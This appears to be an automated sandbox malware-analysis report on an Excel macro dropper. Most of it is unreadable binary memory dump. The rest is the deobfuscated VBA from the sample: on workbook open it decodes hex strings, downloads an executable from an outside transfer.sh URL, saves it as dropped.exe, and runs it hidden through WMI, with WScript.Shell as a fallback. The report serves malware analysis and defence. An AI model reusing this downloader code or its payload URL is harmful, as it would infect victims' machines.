\x00\x00?\x00???????I\x00?????\x02???\xfffd??\x00?????\x08???\xfffd??\x00?????\x06???\xfffd?\x04\xfffd\x00\x05??\x00???\x01\x00t\x00?\x00\x00??\x00???\x00?????\x05?d?\x06???\xfffd?\x03??\x01???#\x00\x00??\x138\x00??\x00??\x00???\x00\x00\x00???\x15\x00??\x03?\x11?\x04?????\x01?\x11?\x02? \x00?\x12??????\xfffd?\x04g\x00\x06??\x00?\x05\x008\x00??\x11d?\x00????d?\x00??\x07??\x05???\x00??????\x14???\x00?I\x00??\x18?\x13??\xfffd?\x03N\x00\x07??\x00???\x00\x00?\x02?\x00?\x00?\x01?\x00?\x01?\xfffd\x00??\x00??]\x00`?\x1c?\x13G\x00?\x13???? \x00?????\x00????d??\x00?\x00\x00\x00\x00???\x00?\x12?????????\x1d?#\x00\x00\x00???o\x00?\x00???????????\x1b????????\x00??\x1b?? \x00?\x13???? \x00?.?\x11??\x00??\x1b??\x16??????d???????????\x1c?e??\xfffd?\x05???\x00?\x05?\x1e?\x02?>?\x00?\x01?\x00?.?\x00?\x00???\x00??\x01\x00??\x06???\xfffd??\x00???\x07?8\x00?\x00?\x045\x00\x08???\x00??\x00??\x19??\x19???\x00??\x00\x00?\x00?\x00\x00\x11\x00?\x04J\x00\x00\x00Z\x00?\x00\x00?\x10?8\x00\x00??\xfffd??\xfffd??\x18??\x00\x00??\x00\xfffd?\x00??\x00???\x00?\x045\x00\x08??\x00????\x00??\x00??\x19??\x19??\x138\x00?????\xfffd\x00?\x040\x00\x08???\x00??\x00??"??\x17??\x138\x00?\x05\x008\x00???\x08???\x00?\x08?\x1e?\x02?? ?\x19??\x03?\x00 ?G\x00?\x0e?\x00\x00?\x00?\x00?\x00?\x00?S\x00? ?e8\x00?M\x00?\x00\x00? ??? \x00\x00?\x00???\xfffd\x00\x00???? ??\x00? ???????????\x00?\x04?\x00\x01??\x02?\x00\x00?\x10? \x00??\x00? \x00? \x00???\x0c?\x01\x00!\x00?\x00??\xfffd??\x01??\x00?\x0c??\x00\x00??\xfffd??\x01??\x00? ?8\x00??\xfffd??\x01??\x00?\x0b????? ???\x00? ???\x00??\x01\x00??\x0e???\xfffd??\x00???\x0f?\x00?\x05?\x00 ??\x02?\x00\x00?\x10??\x00????\x00?\x00?\x01?\x01??\x00??#??\x00??\x00?\xfffd??\x1c??\x00??\x1d??\x00?\x1e??\x01?(??\x00??\x14\x00?\x00??\x07\x00?\x01\x00\x00??\x1f?U\x00? ??????#??\x00??\x00?\xfffd??\x1c??\x00??\x1d??\x00????\x00?i??\x01?\x02??\x00????????k??\x1b??\x00?\x12??\x17\x00?\x11??2??\x00??\x00?\x03??\x00??8\x00\x00?)??\x00??\x00??\x00??\x00?%??\x13??\x00? \x01\x00??????d?\x00?i??\x01?\x06??\x00??\x00?\x17\x00?\x11??4??\x00??\x00?\x07?? \x00???? \x00?????\x00??\xfffd??\x00??\x00?\x17\x00?\x11??5??\x00??\x00?\x08??\x00??????\xfffd???\x00?\x16??\x17\x00?\x11??6??\x00??\x00?\x08??\x00????\x00?\x10???\x00?\x10?? ?#?? ?\xfffd???\x00???\x18?\x00??\x00???\x19?\x00??\x00???\x1a?8\x00?\x00??\x00???\x1b?\x00??\x00???\x1c?\x00??\x00???\x1d?\x00??\x00???\x1e?\x00??\x00???\x1f?\x00?O?8\x00??\x00?\x00\x00\x00?+??\x00?\x00\x00?\x00?\x06?\x00\x0b??\x00?\x00\x00?J??\x01????\x01?\x00?\x02?\x02?\x01?\x01?\x00?\x00??\x00???\x01??#\x00G\x00????????? ???????\x00???\x01??\x00????\x01??\x00?-??\x00?j\x00?\xfffd???\x00? \x04\x00??\xfffd??\xfffd???\x00?E??\x01?? ???\x00\x00????\xfffd\x00?E???\x00??\x1d??\x00?#\x00\x00???\x00??\xfffd????\x00?\xfffd??\x00\x00\x00??\xfffd???\x00???????'??\x00?D????^?\x00??L??\x00?]??\x00??\xfffd???\x00?;??\x00??\xfffd\x00?\x00\x00??\xfffd???\x00?A??????\x00?1????\x00\x00?????\xfffd??\xfffd???\x00?G??\x00?????\xfffd??a??<???\x00???^?\x00?p???\x00?I? \x00???? \x00???????\x02\x00??????`?\x00?"??\x17\x00?!??T??\x00??\x00?\x0b?\x13??\xfffd?\xfffd??\x00??\x00??\x00??\x00?4??#??\x00????\x00?\x04?\x00\x0c??\x00???\x00\x04??[??\x00?\x0b?\xfffd?? ???\x00`?\x00??\x00??\x00??\x00?4??$??\x00?????\x00??\x00?6???\x00???\x00???\x00\x00?? ???\x00? ?\x1e?\x02?? ?\xfffd?? ?\xfffd???\x00???(?\x00]\x03l\x00 ??\x02?\x00\x00?\x10??\x01????\x01N\x00?\x01?e\x00?\xfffd\x00?\x00???\x01\x009\x00?\x00??7??8\x00\x00??\xfffd??\x00? \x00\x00???\xfffd\x00\x00??\xfffd?\x00?\x13\x00\x00??\x00?\x05\x00?\x00??:??8\x00\x00?^???\x00?;????\x19\x00??\x0f??\x00?\x00\x00?8\x00\x00\x12?\x00?}?8\x00?K\x00\x12?\x0e??\x00?\x00\x00? \x00????X?\xfffd`?\x00?>?\x13??\xfffd??\x00?_????\x00?\x00\x02~??\x00\x00\x02-??\x00\x00?)???\x00?)??\x04\x1f\x00\x0e?????\x00??\x03\x00\x11?????\xfffd?\x06\xfffd\x00\x0f??\x00?\x0c?\x02\x00\x05\x00V\x008\x00?????\x00????\x00\x00d?e \x00?h??????\xfffd?d?\xfffd??????\x00??4\x00?\x00?2\x00??G\x00?g????G\x00???????????????\x02%\x00\x10??\x00?\x18\x00?\x00\x00?c??\x00????\x11\x00?\x04?\x00\x11??A??B???:\x00?????\x1b\x00??C??\x00 ?E?\x00?\x00\x00???\x00 \x00???????????\x00?????\x00??C??\x00 ??\x00\x00?????\x00????\x00???+?8\x00?\x00??\x00???,?\x00]\x04s\x00\x12??\x00?C?\x01\x00\x05\x008\x00?\x05\x008\x00??\x11? \x00?p???? \x00?????\x00?? \x00?n?\x13??\xfffd??I???\x00??r??\x00\x00???u??\x00?)\x00?\x02N\x00?\x00?\x0b\x00?E\x00?\x00??\x17\x00?\x00\x00\x11?\x00?l???\xfffd\x11?\x00??i???\x00?K?8\x00\x00??L????? \x00?o???? \x00????s???\x00?\x00\x00??\x00?\x00\x00???\xfffd?????\x00?\x00\x00??\x00?\x00\x00???\xfffd?\x00\x02z??\x00\x00\x02^??\x00\x00???8\x00??\x00?\x00\x00??-???\x00?-?? ?<?? ?M???\x00??\x01\x00??.???\xfffd]\x07?\x00\x13??\x02???\x01\x00?\x00?\x03\x00?\x02?R\x00?\x02?\x00?\x01?\x01?\x00?\x02?\x00?l\x00????\x00?\xfffd???\x00? \x03\x00?\x00???\xfffd\x02\x00??\xfffd??\x00?v??\x00???O??\x00 \x02\x00?\x00?????????\x00?\xfffd??\x00???\x00?T\x00 \x00?z????????0???\x00?\xfffd??Q??,A???R??????\x00? ??\x00?\xfffd???\xfffd??\x00?~???\x00??\x04\x00\x05\x00X\x00???\x00?\x00???0??\x00?\x0f??\x00?\x11\x00?\x00??\x04\x00??\xfffd?\x00 \x01\x00?\x00???????\x00????\x00?I?????\xfffd?\x00?b\x00??0??\x00?????\x00??0??\x00??\x00??\x00??\x00????\x00???\x00?S??\x00?\x0e??\x00?????V????s\x00??0????\x00?????\x00???N??\x00?\xfffd??\x00??0???,A???}??\x00?\xfffd???\xfffd??\x00???\xfffd????}\x00d?\x00?\x00\x00d?\x00?\x00\x00??\x00???\x01 \x00\x00?\x00???????\x00?\x1a\x00?y???\x00?\|????????a??\x00?W?e???????\x00?\x00\x02\x00\x18\x00?\x00?\x00\x1a\x00\x00\x00?\x06?\x00\x14??\x01???\x10\x00?\x00\x12\x00?\x00o\x00?\x00?\x00\xfffd\x00?\x00?\x00?\x00\xfffd\x00u\x00?\x00?\x00?\x00?\x00?\x01???\x00?g\x00??\x02?\xfffd\x00? \x04\x00??\xfffd??????\x00????\x00?\x7f??\x00?,\x00?\x03??\x00???? \x00?z?????\x00?[??????\x00?\x03??\x00???\x01?\\x00?\x00???\x02????\x00?\x03????\x00?\x02????\x01 \x00??????\x00??\x00?1\x00?\x02?L\x00\x11?Z?????\x01\x00?\xfffd??\x11?\x13???u\x00?\x00???\x00?\x03??\x11?\x00??Y?\x13???\xfffd\x00?\x00?????????\x00?\x02???\x00?????\x01????\x00? \x0e\x00?????Z????????\x00??\x00?\x01\x00???\x00?I\x00?????????\x00?????\x02??\x00???\x00??\xfffd\x01\x00?\x00????????\x00??^????\x00????\x00????\xfffd???\x00?\x08\x00??\xfffd?\xfffd???\x00???a??\x00?H\x00??\x00??\x00?b?????O\x00????\x06\x00?????\x00\x00???\x00??\x00?\x00????\x00?z\x00???????V????\x00?????????\x00????????\x00\x00??\x00????\x01???\x00????\x00???????\x00?i\x00??????? \x0f\x00?\x00???????\x00??\xfffd\x00?\x00?e????\x00?A\x00?????\x00?????????\x00??????????????Z???\x00 \x00\x00?\x00?????????\x05\x00????????????????\xfffd?????Z?????\x00??) IServerXMLHTTPRequest2.ResponseBody() -> ?\xfffd\x03\x00\x04\x00?\x00\xfffd\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00????????????????4???????????$\x00\x00\x00?\x00O\x03??\x00\x00\x00\x00\xfffdDc0?\x08?\x00\x00\x00?\x08 \x00?\x08\x00@ \x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x08?\x00\x00\x00\x02?\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x08K\x00?\x08?\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x08\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x08\x00\x00\x00\x00\x00?\x00H\x00\x00\x00\x00\x00??t\x00?\x08 \x00?\x08?\x00\x00\x00\x00\x00\x00\x00 ???c\x00?\x00?\x08?\x00?\x08\x00\x00\x00\x00\x00\x00@????\x00\x0c\x00?\x08?\x00?\x08\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00?\x08\x00\x00H\x00\x02\x05?\x00?\x00\x03\x00O??\x01?\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?Z\x00??\x01\x00??\x01???\xfffd??\x00???\x02?8\x00?\x00??\x00??\x01\x00??\x03???\xfffd??\x00???\x04?8\x00?\x00?\x03p\x00\x01??\x00?\x00\x00?\x10? \x00??\x00??\x00????\x00N\x00?\x00?\x00??\x06??\x00\x00??\x00???????\x00???\x00^?\x00????\x02\x00????\x11??\x00???F???\x00?\x00\x00?\x00?\x04\xfffd\x00\x02?G\x00???\x00\x00?\x04?\x00?\x00?\x00?t\x00?\x00?\x1f\x00??\x10?\x13 \x00?\x13?????????\xfffd??\x05??\x07??\x00\x00\x00??\x11??\x12?"\x00????\x00\x00d??\x00?????\xfffd??\x01??\x03??\x00\x00\x00??\x11??\x14?"\x00???????\x04\xfffd\x00\x03??\x00???\x01\x00\x14\x00?\x00\x00^?\x00??\x1a\x00d??\x01??\x00\x00?\x00??\x00??\x00??\x14?"\x00??\x11?I\x00??\x00?#\x00\x00\x00???\x00\x00??\x00??\x12?"\x00??\x11??\x00??\x00?#\x00\x00\x00?? \x00\x00?\x00?o??e???\x05?\x00\x04??\x00?\x0c?\x01\x00s\x00?\x00\x00^?\x00??\x00??\x03??d???\x00 \x00\x00?\x00???????I\x00?????\x02???\xfffd??\x00?????\x08???\xfffd??\x00?????\x06???\xfffd?\x04\xfffd\x00\x05??\x00???\x01\x00t\x00?\x00\x00??\x00???\x00?????\x05?d?\x06???\xfffd?\x03??\x01???#\x00\x00??\x138\x00??\x00??\x00???\x00\x00\x00???\x15\x00??\x03?\x11?\x04?????\x01?\x11?\x02? \x00?\x12??????\xfffd?\x04g\x00\x06??\x00?\x05\x008\x00??\x11d?\x00????d?\x00??\x07??\x05???\x00??????\x14???\x00?I\x00??\x18?\x13??\xfffd?\x03N\x00\x07??\x00???\x00\x00?\x02?\x00?\x00?\x01?\x00?\x01?\xfffd\x00??\x00??]\x00`?\x1c?\x13G\x00?\x13???? \x00?????\x00????d??\x00?\x00\x00\x00\x00???\x00?\x12?????????\x1d?#\x00\x00\x00???o\x00?\x00???????????\x1b????????\x00??\x1b?? \x00?\x13???? \x00?.?\x11??\x00??\x1b??\x16??????d???????????\x1c?e??\xfffd?\x05???\x00?\x05?\x1e?\x02?>?\x00?\x01?\x00?.?\x00?\x00???\x00??\x01\x00??\x06???\xfffd??\x00???\x07?8\x00?\x00?\x045\x00\x08???\x00??\x00??\x19??\x19???\x00??\x00\x00?\x00?\x00\x00\x11\x00?\x04J\x00\x00\x00Z\x00?\x00\x00?\x10?8\x00\x00??\xfffd??\xfffd??\x18??\x00\x00??\x00\xfffd?\x00??\x00???\x00?\x045\x00\x08??\x00????\x00??\x00??\x19??\x19??\x138\x00?????\xfffd\x00?\x040\x00\x08???\x00??\x00??"??\x17??\x138\x00?\x05\x008\x00???\x08???\x00?\x08?\x1e?\x02?? ?\x19??\x03?\x00 ?G\x00?\x0e?\x00\x00?\x00?\x00?\x00?\x00?S\x00? ?e8\x00?M\x00?\x00\x00? ??? \x00\x00?\x00???\xfffd\x00\x00???? ??\x00? ???????????\x00?\x04?\x00\x01??\x02?\x00\x00?\x10? \x00??\x00? \x00? \x00???\x0c?\x01\x00!\x00?\x00??\xfffd??\x01??\x00?\x0c??\x00\x00??\xfffd??\x01??\x00? ?8\x00??\xfffd??\x01??\x00?\x0b????? ???\x00? ???\x00??\x01\x00??\x0e???\xfffd??\x00???\x0f?\x00?\x05?\x00 ??\x02?\x00\x00?\x10??\x00????\x00?\x00?\x01?\x01??\x00??#??\x00??\x00?\xfffd??\x1c??\x00??\x1d??\x00?\x1e??\x01?(??\x00??\x14\x00?\x00??\x07\x00?\x01\x00\x00??\x1f?U\x00? ??????#??\x00??\x00?\xfffd??\x1c??\x00??\x1d??\x00????\x00?i??\x01?\x02??\x00????????k??\x1b??\x00?\x12??\x17\x00?\x11??2??\x00??\x00?\x03??\x00??8\x00\x00?)??\x00??\x00??\x00??\x00?%??\x13??\x00? \x01\x00??????d?\x00?i??\x01?\x06??\x00??\x00?\x17\x00?\x11??4??\x00??\x00?\x07?? \x00???? \x00?????\x00??\xfffd??\x00??\x00?\x17\x00?\x11??5??\x00??\x00?\x08??\x00??????\xfffd???\x00?\x16??\x17\x00?\x11??6??\x00??\x00?\x08??\x00????\x00?\x10???\x00?\x10?? ?#?? ?\xfffd???\x00???\x18?\x00??\x00???\x19?\x00??\x00???\x1a?8\x00?\x00??\x00???\x1b?\x00??\x00???\x1c?\x00??\x00???\x1d?\x00??\x00???\x1e?\x00??\x00???\x1f?\x00?O?8\x00??\x00?\x00\x00\x00?+??\x00?\x00\x00?\x00?\x06?\x00\x0b??\x00?\x00\x00?J??\x01????\x01?\x00?\x02?\x02?\x01?\x01?\x00?\x00??\x00???\x01??#\x00G\x00????????? ???????\x00???\x01??\x00????\x01??\x00?-??\x00?j\x00?\xfffd???\x00? \x04\x00??\xfffd??\xfffd???\x00?E??\x01?? ???\x00\x00????\xfffd\x00?E???\x00??\x1d??\x00?#\x00\x00???\x00??\xfffd????\x00?\xfffd??\x00\x00\x00??\xfffd???\x00???????'??\x00?D????^?\x00??L??\x00?]??\x00??\xfffd???\x00?;??\x00??\xfffd\x00?\x00\x00??\xfffd???\x00?A??????\x00?1????\x00\x00?????\xfffd??\xfffd???\x00?G??\x00?????\xfffd??a??<???\x00???^?\x00?p???\x00?I? \x00???? \x00???????\x02\x00??????`?\x00?"??\x17\x00?!??T??\x00??\x00?\x0b?\x13??\xfffd?\xfffd??\x00??\x00??\x00??\x00?4??#??\x00????\x00?\x04?\x00\x0c??\x00???\x00\x04??[??\x00?\x0b?\xfffd?? ???\x00`?\x00??\x00??\x00??\x00?4??$??\x00?????\x00??\x00?6???\x00???\x00???\x00\x00?? ???\x00? ?\x1e?\x02?? ?\xfffd?? ?\xfffd???\x00???(?\x00]\x03l\x00 ??\x02?\x00\x00?\x10??\x01????\x01N\x00?\x01?e\x00?\xfffd\x00?\x00???\x01\x009\x00?\x00??7??8\x00\x00??\xfffd??\x00? \x00\x00???\xfffd\x00\x00??\xfffd?\x00?\x13\x00\x00??\x00?\x05\x00?\x00??:??8\x00\x00?^???\x00?;????\x19\x00??\x0f??\x00?\x00\x00?8\x00\x00\x12?\x00?}?8\x00?K\x00\x12?\x0e??\x00?\x00\x00? \x00????X?\xfffd`?\x00?>?\x13??\xfffd??\x00?_????\x00?\x00\x02~??\x00\x00\x02-??\x00\x00?)???\x00?)??\x04\x1f\x00\x0e?????\x00??\x03\x00\x11?????\xfffd?\x06\xfffd\x00\x0f??\x00?\x0c?\x02\x00\x05\x00V\x008\x00?????\x00????\x00\x00d?e \x00?h??????\xfffd?d?\xfffd??????\x00??4\x00?\x00?2\x00??G\x00?g????G\x00???????????????\x02%\x00\x10??\x00?\x18\x00?\x00\x00?c??\x00????\x11\x00?\x04?\x00\x11??A??B???:\x00?????\x1b\x00??C??\x00 ?E?\x00?\x00\x00???\x00 \x00???????????\x00?????\x00??C??\x00 ??\x00\x00?????\x00????\x00???+?8\x00?\x00??\x00???,?\x00]\x04s\x00\x12??\x00?C?\x01\x00\x05\x008\x00?\x05\x008\x00??\x11? \x00?p???? \x00?????\x00?? \x00?n?\x13??\xfffd??I???\x00??r??\x00\x00???u??\x00?)\x00?\x02N\x00?\x00?\x0b\x00?E\x00?\x00??\x17\x00?\x00\x00\x11?\x00?l???\xfffd\x11?\x00??i???\x00?K?8\x00\x00??L????? \x00?o???? \x00????s???\x00?\x00\x00??\x00?\x00\x00???\xfffd?????\x00?\x00\x00??\x00?\x00\x00???\xfffd?\x00\x02z??\x00\x00\x02^??\x00\x00???8\x00??\x00?\x00\x00??-???\x00?-?? ?<?? ?M???\x00??\x01\x00??.???\xfffd]\x07?\x00\x13??\x02???\x01\x00?\x00?\x03\x00?\x02?R\x00?\x02?\x00?\x01?\x01?\x00?\x02?\x00?l\x00????\x00?\xfffd???\x00? \x03\x00?\x00???\xfffd\x02\x00??\xfffd??\x00?v??\x00???O??\x00 \x02\x00?\x00?????????\x00?\xfffd??\x00???\x00?T\x00 \x00?z????????0???\x00?\xfffd??Q??,A???R??????\x00? ??\x00?\xfffd???\xfffd??\x00?~???\x00??\x04\x00\x05\x00X\x00???\x00?\x00???0??\x00?\x0f??\x00?\x11\x00?\x00??\x04\x00??\xfffd?\x00 \x01\x00?\x00???????\x00????\x00?I?????\xfffd?\x00?b\x00??0??\x00?????\x00??0??\x00??\x00??\x00??\x00????\x00???\x00?S??\x00?\x0e??\x00?????V????s\x00??0????\x00?????\x00???N??\x00?\xfffd??\x00??0???,A???}??\x00?\xfffd???\xfffd??\x00???\xfffd????}\x00d?\x00?\x00\x00d?\x00?\x00\x00??\x00???\x01 \x00\x00?\x00???????\x00?\x1a\x00?y???\x00?\|????????a??\x00?W?e???????\x00?\x00\x02\x00\x18\x00?\x00?\x00\x1a\x00\x00\x00?\x06?\x00\x14??\x01???\x10\x00?\x00\x12\x00?\x00o\x00?\x00?\x00\xfffd\x00?\x00?\x00?\x00\xfffd\x00u\x00?\x00?\x00?\x00?\x00?\x01???\x00?g\x00??\x02?\xfffd\x00? \x04\x00??\xfffd??????\x00????\x00?\x7f??\x00?,\x00?\x03??\x00???? \x00?z?????\x00?[??????\x00?\x03??\x00???\x01?\\x00?\x00???\x02????\x00?\x03????\x00?\x02????\x01 \x00??????\x00??\x00?1\x00?\x02?L\x00\x11?Z?????\x01\x00?\xfffd??\x11?\x13???u\x00?\x00???\x00?\x03??\x11?\x00??Y?\x13???\xfffd\x00?\x00?????????\x00?\x02???\x00?????\x01????\x00? \x0e\x00?????Z????????\x00??\x00?\x01\x00???\x00?I\x00?????????\x00?????\x02??\x00???\x00??\xfffd\x01\x00?\x00????????\x00??^????\x00????\x00????\xfffd???\x00?\x08\x00??\xfffd?\xfffd???\x00???a??\x00?H\x00??\x00??\x00?b?????O\x00????\x06\x00?????\x00\x00???\x00??\x00?\x00????\x00?z\x00???????V????\x00?????????\x00????????\x00\x00??\x00????\x01???\x00????\x00???????\x00?i\x00??????? \x0f\x00?\x00???????\x00??\xfffd\x00?\x00?e????\x00?A\x00?????\x00?????????\x00??????????????Z???\x00 \x00\x00?\x00?????????\x05\x00????????????????\xfffd?????Z?????\x00?? executed
27	mclnjwgjqaeyhh.SaveToFile xdgiejom, 2	SaveToFile
28	mclnjwgjqaeyhh.Close	Close
29	qgssfhxdi xdgiejom
30	Endif
31	End Sub

Subroutine
Workbook_OpenAPIs: 14, Strings: 0, Number of lines: 3, Relevance: 22.503

APIs	Meta Information
Part of subcall function cjpojbxatghyew@ThisWorkbook: Environ
Part of subcall function cjpojbxatghyew@ThisWorkbook: CreateObject
Part of subcall function cjpojbxatghyew@ThisWorkbook: setOption
Part of subcall function cjpojbxatghyew@ThisWorkbook: Open
Part of subcall function cjpojbxatghyew@ThisWorkbook: setRequestHeader
Part of subcall function cjpojbxatghyew@ThisWorkbook: Send
Part of subcall function cjpojbxatghyew@ThisWorkbook: Status
Part of subcall function cjpojbxatghyew@ThisWorkbook: CreateObject
Part of subcall function cjpojbxatghyew@ThisWorkbook: Open
Part of subcall function cjpojbxatghyew@ThisWorkbook: Type
Part of subcall function cjpojbxatghyew@ThisWorkbook: Write
Part of subcall function cjpojbxatghyew@ThisWorkbook: ResponseBody
Part of subcall function cjpojbxatghyew@ThisWorkbook: SaveToFile
Part of subcall function cjpojbxatghyew@ThisWorkbook: Close

Line	Instruction	Meta Information
32	Sub Workbook_Open()
33	cjpojbxatghyew	executed
34	End Sub

Function
wyfqtgmzehxeAPIs: 4, Strings: 0, Number of lines: 6, Relevance: 7.506

APIs	Meta Information
Len	Len("68") -> 2 Len("747470733a2f2f7472616e736665722e73682f5576355846592f303030302e4c504344323032322e657865") -> 86 Len("64726f") -> 6 Len("707065642e657865") -> 16 Len("4d53584d4c322e5365727665") -> 24 Len("72584d4c485454502e362e30") -> 24 Len("474554") -> 6 Len("557365722d") -> 10 Len("4167656e74") -> 10 Len("4d6f7a696c6c612f342e302028636f6d70617469626c653b204d53494520362e303b2057696e646f7773204e542035") -> 94 Len("2e3029") -> 6 Len("4144") -> 4 Len("4f44422e53747265616d") -> 20
Chr$
Val
Mid$

Line	Instruction	Meta Information
35	Private Function wyfqtgmzehxe(ByVal iosusgmoatjf as String) as String
36	Dim wwsxtjjexree as Long	executed
37	For wwsxtjjexree = 1 To Len(iosusgmoatjf) Step 2	Len("68") -> 2 executed
38	wyfqtgmzehxe = wyfqtgmzehxe & Chr$(Val("&H" & Mid$(iosusgmoatjf, wwsxtjjexree, 2)))	Chr$ Val Mid$
39	Next wwsxtjjexree	Len("68") -> 2 executed
40	End Function

Module: dogbdtbkc

Declaration

Line	Content
1	Attribute VB_Name = "dogbdtbkc"

Executed Functions

Subroutine
qgssfhxdiAPIs: 12, Strings: 0, Number of lines: 10, Relevance: 15.01

APIs	Meta Information
Clear
Part of subcall function wdzlbznhf@vzbprmttn: GetObject
Part of subcall function wdzlbznhf@vzbprmttn: Get
Part of subcall function wdzlbznhf@vzbprmttn: SpawnInstance_
Part of subcall function wdzlbznhf@vzbprmttn: ShowWindow
Part of subcall function wdzlbznhf@vzbprmttn: GetObject
Part of subcall function wdzlbznhf@vzbprmttn: Create
Part of subcall function wdzlbznhf@vzbprmttn: intProcessID
Number
Err
Clear
Part of subcall function kwsdbwalvozrufglg@yhrgaijdj: Run

Line	Instruction	Meta Information
2	Sub qgssfhxdi(mdrurnicxqgnk as String)
3	On Error Resume Next	executed
4	Err.Clear	Clear
5	wimResult = wdzlbznhf(mdrurnicxqgnk)
6	If Err.Number <> 0 Or wimResult <> 0 Then	Number Err
7	Err.Clear	Clear
8	kwsdbwalvozrufglg mdrurnicxqgnk
9	Endif
10	On Error Goto 0
11	End Sub

Module: vzbprmttn

Declaration

Line	Content
1	Attribute VB_Name = "vzbprmttn"

Executed Functions

Function
wdzlbznhfAPIs: 19, Strings: 3, Number of lines: 8, Relevance: 62.008

APIs	Meta Information
GetObject	GetObject("winmgmts:\\.\root\cimv2")
Part of subcall function soyfeuyzgsyz@vzbprmttn: Len
Part of subcall function soyfeuyzgsyz@vzbprmttn: Chr$
Part of subcall function soyfeuyzgsyz@vzbprmttn: Val
Part of subcall function soyfeuyzgsyz@vzbprmttn: Mid$
Get
Part of subcall function soyfeuyzgsyz@vzbprmttn: Len
Part of subcall function soyfeuyzgsyz@vzbprmttn: Chr$
Part of subcall function soyfeuyzgsyz@vzbprmttn: Val
Part of subcall function soyfeuyzgsyz@vzbprmttn: Mid$
SpawnInstance_	SWbemObjectEx.SpawnInstance_()
ShowWindow
GetObject	GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
Part of subcall function soyfeuyzgsyz@vzbprmttn: Len
Part of subcall function soyfeuyzgsyz@vzbprmttn: Chr$
Part of subcall function soyfeuyzgsyz@vzbprmttn: Val
Part of subcall function soyfeuyzgsyz@vzbprmttn: Mid$
Create	SWbemObjectEx.Create("C:\Users\Albus\AppData\Local\Temp\dropped.exe",,,) -> 0
intProcessID

Strings	Decrypted Strings
"77696e6d676d74733a5c5c"
"57696e33"
"77696e6d676d74733a5c5c2e5c726f6f745c63696d76323a57696e33325f"

Line	Instruction	Meta Information
2	Function wdzlbznhf(ixzfgqpig as String) as Integer
3	Set edkankwdkqmipo = GetObject(soyfeuyzgsyz("77696e6d676d74733a5c5c") & soyfeuyzgsyz("2e5c726f6f745c63696d7632"))	GetObject("winmgmts:\\.\root\cimv2") executed
4	Set jupwigkjmzusaimuh = edkankwdkqmipo.Get(soyfeuyzgsyz("57696e33") & soyfeuyzgsyz("325f50726f6365737353746172747570"))	Get
5	Set zntkkzkmzqhln = jupwigkjmzusaimuh.SpawnInstance_	SWbemObjectEx.SpawnInstance_() executed
6	zntkkzkmzqhln.ShowWindow = 0	ShowWindow
7	Set kcsxyinih = GetObject(soyfeuyzgsyz("77696e6d676d74733a5c5c2e5c726f6f745c63696d76323a57696e33325f") & soyfeuyzgsyz("50726f63657373"))	GetObject("winmgmts:\\.\root\cimv2:Win32_Process") executed
8	wdzlbznhf = kcsxyinih.Create(ixzfgqpig, Null, zntkkzkmzqhln, intProcessID)	SWbemObjectEx.Create("C:\Users\Albus\AppData\Local\Temp\dropped.exe",,,) -> 0 intProcessID executed
9	End Function

Function
soyfeuyzgsyzAPIs: 4, Strings: 0, Number of lines: 6, Relevance: 7.506

APIs	Meta Information
Len	Len("77696e6d676d74733a5c5c") -> 22 Len("2e5c726f6f745c63696d7632") -> 24 Len("57696e33") -> 8 Len("325f50726f6365737353746172747570") -> 32 Len("77696e6d676d74733a5c5c2e5c726f6f745c63696d76323a57696e33325f") -> 60 Len("50726f63657373") -> 14
Chr$
Val
Mid$

Line	Instruction	Meta Information
10	Private Function soyfeuyzgsyz(ByVal ivvupjbvpfpv as String) as String
11	Dim avroknxhwdfg as Long	executed
12	For avroknxhwdfg = 1 To Len(ivvupjbvpfpv) Step 2	Len("77696e6d676d74733a5c5c") -> 22 executed
13	soyfeuyzgsyz = soyfeuyzgsyz & Chr$(Val("&H" & Mid$(ivvupjbvpfpv, avroknxhwdfg, 2)))	Chr$ Val Mid$
14	Next avroknxhwdfg	Len("77696e6d676d74733a5c5c") -> 22 executed
15	End Function

Module: yhrgaijdj

Declaration

Line	Content
1	Attribute VB_Name = "yhrgaijdj"

Non-Executed Functions

Function
zgzorzvdjmqcAPIs: 4, Strings: 0, Number of lines: 6, Relevance: 5.006

APIs	Meta Information
Len
Chr$
Val
Mid$

Line	Instruction	Meta Information
5	Private Function zgzorzvdjmqc(ByVal gljjlqdrymld as String) as String
6	Dim jgpkaiatiidu as Long
7	For jgpkaiatiidu = 1 To Len(gljjlqdrymld) Step 2	Len
8	zgzorzvdjmqc = zgzorzvdjmqc & Chr$(Val("&H" & Mid$(gljjlqdrymld, jgpkaiatiidu, 2)))	Chr$ Val Mid$
9	Next jgpkaiatiidu	Len
10	End Function

Subroutine
kwsdbwalvozrufglgAPIs: 1, Strings: 1, Number of lines: 3, Relevance: 3.003

APIs	Meta Information
Run

Strings	Decrypted Strings
"57536372"

Line	Instruction	Meta Information
2	Sub kwsdbwalvozrufglg(cmdLine as String)
3	CreateObject(zgzorzvdjmqc("57536372") & zgzorzvdjmqc("6970742e5368656c6c")).Run cmdLine, 0	Run
4	End Sub

Reset < >

Analysis Process: dropped.exePID: 1980, Parent PID: 1856COMMON

Execution Graph

Execution Coverage:	12.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	18
Total number of Limit Nodes:	0

Executed Functions

Function 002D69C8 Relevance: 2.2, Strings: 1, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UUUU, xrefs: 002D6E9A

Memory Dump Source

Source File: 00000002.00000002.918993245.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d0000_dropped.jbxd

Similarity

API ID:
String ID: UUUU
API String ID: 0-1798160573
Opcode ID: 6b8eef223944ccfd6924295e208c56fcdb871ed81f85edda1f674286ad7340e4
Instruction ID: d6b9efb932095ee5cc1b7ebb48df66962f4d62233c7b97c8c303291328e743dd
Opcode Fuzzy Hash: 6b8eef223944ccfd6924295e208c56fcdb871ed81f85edda1f674286ad7340e4
